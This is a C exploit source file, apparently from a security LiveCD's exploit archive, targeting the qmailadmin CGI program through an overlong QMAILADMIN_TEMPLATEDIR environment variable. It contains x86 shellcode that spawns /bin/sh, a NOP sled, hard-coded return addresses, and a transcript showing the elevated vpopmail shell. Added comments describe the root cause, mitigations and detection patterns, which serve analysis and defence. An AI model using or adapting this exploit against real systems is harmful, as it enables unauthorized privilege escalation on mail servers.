/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / qmail / qmailadmin-exp.c < prev    next >
Text File  |  2005-02-12  |  1KB  |  40 lines

  1. /* http://www.badc0ded.com (bug found by Thomas Cannon)
  2.  / bash-2.05a$ ./qmailadmin-exp
  3.  / Content-Type: text/html
  4.  / $ id
  5.  / uid=1000(dim) euid=89(vpopmail) gid=1000(dim) egid=89(vchkpw) groups=89(vchkpw), 1000(dim), 0(wheel)
  6.  / $ 
  7. */
  8.  
  9.  
  /* Payload bytes that main() embeds in the QMAILADMIN_TEMPLATEDIR value.
   * 23 bytes of x86 machine code with no NUL byte, so strcat() copies all of it.
   * It builds the string "/bin//sh" on the stack and issues int $0x80 with
   * %al = 0x3b (59; presumably execve on FreeBSD/i386, judging by the
   * /usr/local/www path used in main() -- confirm). This is the shell seen in
   * the transcript at the top of the file.
   * Defender note: this fixed byte sequence, preceded by a long run of 0x90,
   * is a usable match pattern for host or content inspection.
   */
  10. char shellcode[]=          /* 23 bytes                       */
  11.     "\x31\xc0"             /* xorl    %eax,%eax              */
  12.     "\x50"                 /* pushl   %eax                   */
  13.     "\x68""//sh"           /* pushl   $0x68732f2f            */
  14.     "\x68""/bin"           /* pushl   $0x6e69622f            */
  15.     "\x89\xe3"             /* movl    %esp,%ebx              */
  16.     "\x50"                 /* pushl   %eax                   */
  17.     "\x54"                 /* pushl   %esp                   */
  18.     "\x53"                 /* pushl   %ebx                   */
  19.     "\x50"                 /* pushl   %eax                   */
  20.     "\xb0\x3b"             /* movb    $0x3b,%al              */
  21.     "\xcd\x80"             /* int     $0x80                  */
  22. ;
  23.  
  /* Builds one oversized QMAILADMIN_TEMPLATEDIR value and runs qmailadmin
   * directly from a local shell with that value in its environment.
   * Layout of the value (14820 bytes in total):
   *   5977 x 0x90 | 23-byte shellcode | 2204 x 0x0806efd8 | 0xbfbfcbf1
   *
   * The transcript at the top of the file shows the resulting shell holding
   * euid=vpopmail / egid=vchkpw, so the target runs with elevated effective IDs.
   * Presumably it copies this variable into a fixed-size buffer without a
   * length check -- the target source is not shown here; confirm.
   *
   * Defender notes:
   *  - Root cause to fix in the target: bound the copy of the environment
   *    value, and do not honour caller-supplied override variables while
   *    running with elevated IDs.
   *  - Both 4-byte values are hard-coded addresses, so the program is tied to
   *    one build and memory layout; non-executable stack, stack canaries and
   *    address randomisation would be expected to break it.
   *  - Detection: a single multi-kilobyte environment variable handed to a
   *    set-id binary, and a CGI binary exec'd by a local user, not the web server.
   */
  24. main ()
  25. {
  26.    char buf[16000];
  27.    int i;
  28.    memset(buf,0,sizeof(buf));   /* zero-fill so every strcat() below finds a terminator */
  29.    memset(buf,0x90,5977);       /* first 5977 bytes are 0x90, the x86 NOP opcode */
  30.    strcat(buf,shellcode);       /* 5977 + 23 = 6000 bytes so far */
  31.  
  32.    for (i=0;i<=2203;i++)        /* inclusive bound: 2204 repeats x 4 bytes = 8816 bytes */
  33.      strcat(buf,"\xd8\xef\x06\x08");   // lang_fs magic.. 0x0806efd8 little-endian; presumably an address tied to the target's lang_fs variable -- confirm
  34.    strcat (buf,"\xf1\xcb\xbf\xbf");    // ret.. 0xbfbfcbf1 little-endian; presumably the value meant to replace the saved return address -- confirm
  35.    setenv("QMAILADMIN_TEMPLATEDIR",buf);   /* the untrusted input channel: an environment variable the target reads */
  36.    execlp("/usr/local/www/cgi-bin.default/qmailadmin/qmailadmin","qmailadmin",0);   /* run the CGI binary directly; it inherits the environment set above */
  37.    
  38.    
  39. }
  40.